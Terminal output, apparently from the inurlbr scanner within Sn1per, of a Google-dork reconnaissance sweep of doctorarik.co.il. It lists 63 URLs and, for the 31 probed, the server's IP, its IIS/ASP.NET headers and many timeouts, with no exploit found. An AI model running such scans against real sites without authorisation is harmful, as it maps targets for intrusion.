Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m

[1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt  ][0m
[1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:doctorarik.co.il ]
[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.ee ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
[1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.im ID: 012347377894689429761:wgkj5jn9ee4 ][0m

[1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m

[1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 63 ][0m

[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 0 / 63 [1;37m][0;37m-[23:32:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 1 / 63 [1;37m][0;37m-[23:33:02][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/20170629102001-ooy-425.html[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP::0 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 2 / 63 [1;37m][0;37m-[23:33:07][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP::0 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 3 / 63 [1;37m][0;37m-[23:33:12][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP::0 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 4 / 63 [1;37m][0;37m-[23:33:22][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/thetencommandments/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 5 / 63 [1;37m][0;37m-[23:33:30][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m,   , IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 0 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 6 / 63 [1;37m][0;37m-[23:33:38][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/contact/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7773 out of 16348 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 7 / 63 [1;37m][0;37m-[23:33:43][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/checkyourself/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 8 / 63 [1;37m][0;37m-[23:33:50][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 9 / 63 [1;37m][0;37m-[23:33:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/movie/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 9121 out of 15003 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 10 / 63 [1;37m][0;37m-[23:34:03][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/keepslimming/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 18557 out of 23967 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 11 / 63 [1;37m][0;37m-[23:34:12][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/parentstips/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13165 out of 19394 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 12 / 63 [1;37m][0;37m-[23:34:20][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childfaq/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10469 out of 24867 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 13 / 63 [1;37m][0;37m-[23:34:30][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultcustomers/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10469 out of 21199 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 14 / 63 [1;37m][0;37m-[23:34:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultfaq/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 18557 out of 47581 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 15 / 63 [1;37m][0;37m-[23:34:45][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/recipes/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 2381 out of 21166 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 16 / 63 [1;37m][0;37m-[23:34:52][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/myprogram/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 17 / 63 [1;37m][0;37m-[23:34:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/wp-login.php[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 18 / 63 [1;37m][0;37m-[23:35:00][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/myths/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 19 / 63 [1;37m][0;37m-[23:35:06][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businesstips/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 20 / 63 [1;37m][0;37m-[23:35:12][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businessmyway/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 15092 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 21 / 63 [1;37m][0;37m-[23:35:19][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/business/businessnutrition/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 16283 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 22 / 63 [1;37m][0;37m-[23:35:22][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/stepbystep/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 23 / 63 [1;37m][0;37m-[23:35:28][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/drarik/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 14705 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 24 / 63 [1;37m][0;37m-[23:35:34][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/stabbing/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 16732 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 25 / 63 [1;37m][0;37m-[23:35:41][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/technologylinks/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 22665 out of 53619 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 26 / 63 [1;37m][0;37m-[23:35:48][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/bmichild/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7837 out of 15353 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 27 / 63 [1;37m][0;37m-[23:35:57][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adultlinks/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 19969 out of 93853 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 28 / 63 [1;37m][0;37m-[23:36:03][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/pharmalinks/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 53331 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 29 / 63 [1;37m][0;37m-[23:36:08][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/about/rebaka/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 30 / 63 [1;37m][0;37m-[23:36:13][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/thetencommandments/terms/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
